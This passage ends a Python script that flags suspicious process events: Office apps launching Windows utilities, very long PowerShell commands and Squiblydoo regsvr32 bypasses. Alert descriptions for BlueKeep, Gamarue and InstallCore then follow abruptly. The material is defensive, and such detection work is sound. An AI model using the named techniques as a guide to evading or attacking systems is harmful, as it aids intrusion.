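    return image_name(child) in POWERSHELL_IMAGES and len(cmdline) >= LONG_COMMAND_THRESHOLD


def squiblydoo_regsvr32(parent, child, cmdline):
    return image_name(child) == "regsvr32.exe" and SQUIBLYDOO_RE.search(cmdline) is not None


DETECTORS = {
    "office_process_started_windows_utility": office_spawned_utility,
    "excessively_long_powershell_command": excessively_long_powershell,
    "squiblydoo_whitelist_bypass": squiblydoo_regsvr32,
}


def classify(events):
    """Return [(event_index, [matched rule names])] for every event that trips at least one rule."""
    hits = []
    for idx, (parent, child, cmdline) in enumerate(events):
        matched = [name for name, rule in DETECTORS.items() if rule(parent, child, cmdline)]
        if matched:
            hits.append((idx, matched))
    return hits


if __name__ == "__main__":
    for idx, rules in classify(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(rules)}  <- {SAMPLE_EVENTS[idx][2][:80]}")
```

Rules keyed on the parent image are the ones that generalize best here: a nightly backup script and a COM registration from an installer both look legitimate to the length and regsvr32 rules, while an Office application launching cmd.exe is rarely legitimate regardless of what the command line contains.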
CVE-2019-0708 detected - (128)
An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.
Gamarue malware detected - (81)
Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.
Installcore adware detected - (32)
InstallCore is an installer that bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that displays advertising in the form of pop-ups or by injecting into browsers and adding or altering advertisements on web pages. Adware is known to sometimes download and install malware.